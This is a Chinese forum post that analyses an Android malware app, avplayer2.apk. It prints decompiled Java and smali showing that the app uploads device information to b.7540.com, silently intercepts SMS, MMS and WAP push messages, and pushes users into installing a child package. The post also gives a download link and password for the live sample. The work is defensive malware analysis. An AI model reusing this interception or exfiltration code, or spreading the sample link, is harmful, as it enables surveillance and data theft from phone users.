本帖最后由 kangkai 于 2014-2-16 23:06 编辑
一、病毒样本基本信息
文件信息:
File Name: avplayer2.apk
File MD5: 750602da49e8b374dd476f37e620e40b Package:com.extremeplayer.cl
样本下载地址:http://yunpan.cn/QDhDrB2LbJyyf 访问密码 58f2
该病毒主要有两部分组成: 1. 母安装包:检测恶意子包是否安装,如果设备没有安装恶意子包,则负责诱骗用户安装;并完成短信、彩信等的拦截、上传手机等信息 2. 子安装包:基本没有什么太大恶意,就不做详细分析了。
母安装包工作原理如下:
二、病毒代码分析
查看AndroidMainfext.xml配置文件。程序可以通过com.uus.mv2.service.MyReceiver、om.uus.mv2.activity.IndexUIActivity等组件启动
配置文件如下:
[Java] 纯文本查看 复制代码 </receiver>
<receiver android:name="com.uus.mv2.service.MyReceiver">
<intent-filter android:priority="2147483647">
<action android:name="android.provider.Telephony.WAP_PUSH_RECEIVED" />
<action android:name="yulong.provider.Telephony.DUAL_WAP_PUSH_RECEIVED" />
<action android:name="android.provider.Telephony.WAP_PUSH_RECEIVED_2" />
<action android:name="android.provider.Telephony.WAP_PUSH_GSM_RECEIVED" />
<data android:mimeType="application/vnd.wap.mms-message" />
<category android:name="android.intent.category.DEFAULT" />
</intent-filter>
</receiver>
<receiver android:name="com.uus.mv2.service.MyReceiver">
<intent-filter android:priority="2147483647">
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
</intent-filter>
</receiver>
<activity android:label="@string/app_name" android:name="com.uus.mv2.activity.StartActivity" android:screenOrientation="portrait">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
<activity android:name="com.uus.mv2.activity.IndexUIActivity" android:screenOrientation="portrait">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
</intent-filter>
</activity>
<activity android:name="com.uus.mv2.activity.DetailActivity" android:screenOrientation="portrait">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
</intent-filter>
</activity>
<activity android:name="com.uus.mv2.activity.OrderActivity" android:screenOrientation="portrait">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
</intent-filter>
</activity>
<activity android:name="com.uus.mv2.activity.Media_Activity" android:screenOrientation="sensor" android:configChanges="locale|keyboardHidden|orientation">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
</intent-filter>
</activity>
<receiver android:name="MyReceiver">
<intent-filter>
<action android:name="android.intent.action.PACKAGE_ADDED" />
<data android:scheme="package" />
</intent-filter>
<intent-filter>
<action android:name="android.intent.action.USER_PRESENT" />
</intent-filter>
</receiver>
<meta-data android:name="NOICON_CHANNEL" android:value="25" />
<meta-data android:name="UMENG_APPKEY" android:value="52b0271e56240b55790437ac" />
<meta-data android:name="UMENG_CHANNEL" android:value="app75401107" />
</application>
</manifest>
当每次启动程序时,会检测子安装包是否已经安装,如果没有安装,则提示安装;直至用户安装子安装包
源代码如下:
[Java] 纯文本查看 复制代码 public void onReceive(Context paramContext, Intent paramIntent)
{
if (paramIntent.getAction().equals("android.intent.action.PACKAGE_ADDED"))
if (paramIntent.getDataString().substring(8).equals("com.android.zero.noiconads"))
// 已安装子安装包
{
i = Build.VERSION.SDK_INT;
localIntent = new Intent("action.install_finish");
if (i >= 12)
localIntent.setFlags(32);
paramContext.sendBroadcast(localIntent);
}
while (!paramIntent.getAction().equals("android.intent.action.USER_PRESENT"))
{
int i;
Intent localIntent;
return;
}
InstallNoIconApk.copySoft(paramContext); // 安装子安装包
}
}
smali代码如下:
[Java] 纯文本查看 复制代码 if-eqz v3, :cond_2
.line 14
invoke-virtual {p2}, Landroid/content/Intent;->getDataString()Ljava/lang/String;
move-result-object v3
const/16 v4, 0x8
invoke-virtual {v3, v4}, Ljava/lang/String;->substring(I)Ljava/lang/String;
move-result-object v2
.line 15
.local v2, packagename:Ljava/lang/String;
const-string v3, "com.android.zero.noiconads"
invoke-virtual {v2, v3}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
move-result v3
if-eqz v3, :cond_1
.line 16
sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
.line 17
.local v0, api:I
new-instance v1, Landroid/content/Intent;
const-string v3, "action.install_finish"
invoke-direct {v1, v3}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
.line 18
.local v1, intnetbroad:Landroid/content/Intent;
const/16 v3, 0xc
if-lt v0, v3, :cond_0
.line 19
const/16 v3, 0x20
invoke-virtual {v1, v3}, Landroid/content/Intent;->setFlags(I)Landroid/content/Intent;
.line 21
:cond_0
invoke-virtual {p1, v1}, Landroid/content/Context;->sendBroadcast(Landroid/content/Intent;)V
.line 26
.end local v0 #api:I
.end local v1 #intnetbroad:Landroid/content/Intent;
.end local v2 #packagename:Ljava/lang/String;
:cond_1
:goto_0
return-void
.line 23
:cond_2
invoke-virtual {p2}, Landroid/content/Intent;->getAction()Ljava/lang/String;
move-result-object v3
const-string v4, "android.intent.action.USER_PRESENT"
invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
move-result v3
if-eqz v3, :cond_1
.line 24
invoke-static {p1}, Lcom/android/guideadsnoicon/InstallNoIconApk;->copySoft(Landroid/content/Context;)V
goto :goto_0
.end method
获取手机相关信息,并上传至b.7540.com
源代码如下:
[Java] 纯文本查看 复制代码 public void run()
{
HttpGet localHttpGet = new HttpGet(http://b.7540.com/app/channel_ispop.do?channelId= //上传至b.7540.com
smali代码如下:
[AppleScript] 纯文本查看 复制代码 new-instance v9, Ljava/lang/StringBuilder;
const-string v10, "http://b.7540.com/app/channel_ispop.do?channelId="
invoke-direct {v9, v10}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
监控接收到的短信、彩信、wap信息
源代码如下:
[Java] 纯文本查看 复制代码 private void a(Context paramContext, Intent paramIntent)
{
Bundle localBundle = paramIntent.getExtras();
this.a.d("::::::bundle = " + localBundle.toString());
if (localBundle.containsKey("pdus"))
{
Object[] arrayOfObject = (Object[])localBundle.get("pdus");
SmsMessage[] arrayOfSmsMessage = new SmsMessage[arrayOfObject.length];
for (int i = 0; i < arrayOfObject.length; i++)
{
arrayOfSmsMessage[i] = SmsMessage.createFromPdu((byte[])(byte[])arrayOfObject[i]);
this.a.d("::::::smsMessage = " + arrayOfSmsMessage[i].getOriginatingAddress() + ";;; " + arrayOfSmsMessage[i].getMessageBody() + ";;; " + arrayOfSmsMessage[i].getIndexOnIcc());
if (arrayOfSmsMessage[i].getOriginatingAddress().contains(paramContext.getResources().getString(2131362053)))
{
String str = arrayOfSmsMessage[i].getMessageBody();
if (((str.contains(paramContext.getResources().getString(2131362042))) || (str.contains(paramContext.getResources().getString(2131362043))) || (str.contains(paramContext.getResources().getString(2131362044))) || (str.contains(paramContext.getResources().getString(2131362049))) || (str.contains(paramContext.getResources().getString(2131362054))) || (str.contains(paramContext.getResources().getString(2131362055))) || (str.contains(paramContext.getResources().getString(2131362046))) || (str.contains(paramContext.getResources().getString(2131362047))) || (str.contains(paramContext.getResources().getString(2131362059)))) && ((str.contains(paramContext.getResources().getString(2131362050))) || (str.contains(paramContext.getResources().getString(2131362058))) || (str.contains(paramContext.getResources().getString(2131362051))) || (str.contains(paramContext.getResources().getString(2131362052))) || (str.contains(paramContext.getResources().getString(2131362056))) || (str.contains(paramContext.getResources().getString(2131362045)))))
abortBroadcast();
}
}
}
}
public void onReceive(Context paramContext, Intent paramIntent)
{
if (paramIntent == null);
while (true)
{
return;
this.a.d(":::::::MyReceiver:::onReceive : " + paramIntent.getAction());
if (paramIntent.getAction().equals("android.intent.action.BOOT_COMPLETED"))
{
this.a.d("::::::::::::ACTION_BOOT_COMPLETED");
paramContext.startService(new Intent(paramContext, MyIntentService.class));
}
byte[] arrayOfByte;
if (("yulong.provider.Telephony.DUAL_WAP_PUSH_RECEIVED".equals(paramIntent.getAction())) || ("android.provider.Telephony.WAP_PUSH_RECEIVED_2".equals(paramIntent.getAction())) || ("android.provider.Telephony.WAP_PUSH_GSM_RECEIVED".equals(paramIntent.getAction())) || ("android.provider.Telephony.WAP_PUSH_RECEIVED".equals(paramIntent.getAction())))
//监控WAP-push信息
{
String str1 = paramIntent.getType();
if (("application/vnd.wap.sic".equals(str1)) || ("application/vnd.wap.slc".equals(str1)) || ("application/vnd.wap.coc".equals(str1)) || ("application/vnd.wap.mms-message".equals(str1)))
{
arrayOfByte = paramIntent.getByteArrayExtra("data");
if ((arrayOfByte == null) || (arrayOfByte.length <= 0));
}
}
try
{
String str2 = new String(arrayOfByte, "UTF-8");
this.a.d(":::::ByteArrayExtra = " + str2);
if ((str2.contains(paramContext.getResources().getString(2131362057))) && ((str2.contains(paramContext.getResources().getString(2131362044))) || (str2.contains(paramContext.getResources().getString(2131362045))) || (str2.contains(paramContext.getResources().getString(2131362046))) || (str2.contains(paramContext.getResources().getString(2131362047))) || (str2.contains(paramContext.getResources().getString(2131362048))) || (str2.contains(paramContext.getResources().getString(2131362059)))))
{
abortBroadcast();
String str3 = h.c("CD=" + com.uus.mv2.controller.d.e + "&CC=" + com.uus.mv2.controller.d.f + "&CV=" + com.uus.mv2.controller.d.h + "&UA=" + com.uus.mv2.controller.d.O + "&CP=" + com.uus.mv2.controller.d.d + "&SK=" + Build.VERSION.SDK_INT);
String str4 = com.uus.mv2.controller.d.g + "/t.jsp?O=" + str3;
this.a.d("::::::::::::::::::::::::::control url = " + str4);
c localc = new c(0, 25, str4, 3);
localc.a(null);
localc.d = false;
a.a().a(localc);
}
if ((!paramIntent.getAction().equals("android.intent.action.DATA_SMS_RECEIVED")) && (!"android.provider.Telephony.SMS_RECEIVED".equals(paramIntent.getAction())) && (!"android.provider.Telephony.SMS_RECEIVED_2".equals(paramIntent.getAction())) && (!"android.provider.Telephony.GSM_SMS_RECEIVED".equals(paramIntent.getAction())) && (!"android.provider.Telephony.LMS_FIRST_DISPLAY_TIMEOUT_CTC".equals(paramIntent.getAction())))
//监控短信
continue;
a(paramContext, paramIntent);
return;
}
catch (Exception localException)
{
while (true)
localException.printStackTrace();
}
}
}
}
smali代码如下:
[AppleScript] 纯文本查看 复制代码 new-instance v4, Ljava/lang/StringBuilder;
const-string v5, "::::::smsMessage = "
invoke-direct {v4, v5}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
const-string v0, "yulong.provider.Telephony.DUAL_WAP_PUSH_RECEIVED"
invoke-virtual {p2}, Landroid/content/Intent;->getAction()Ljava/lang/String;
const-string v3, "::::::::::::::::::::::::::control url = "
invoke-direct {v2, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;
// 太多了,没复制完全
对子安装包的分析,没有什么恶意行为,就不做详细分析了。
三、病毒恶意行为
获取并上传手机基本信息、安装应用、拦截短信、彩信等
基于android是一个及其开发的系统,在带来便利的同时,也带来了很大的安全隐患。所以建议大家下载android应用的时候,最好去各大可靠地应用商城下载,例如:360手机助手、腾讯的应用宝,尽可能的减少android病毒进入我们的手机。
//鉴于此病毒在年前我们分析过代码,最近看了看smali的知识,就加上了对smali代码的分析。如有错误之处,尽情谅解。
@willJ @Hmily ,是否应该开一个移动病毒分析的专区,区分PC病毒和移动病毒。
| 
[复制链接]
发表于 2014-2-16 23:01
发表于 2014-3-16 15:46
发表于 2014-2-16 23:08
发表于 2014-2-16 23:43
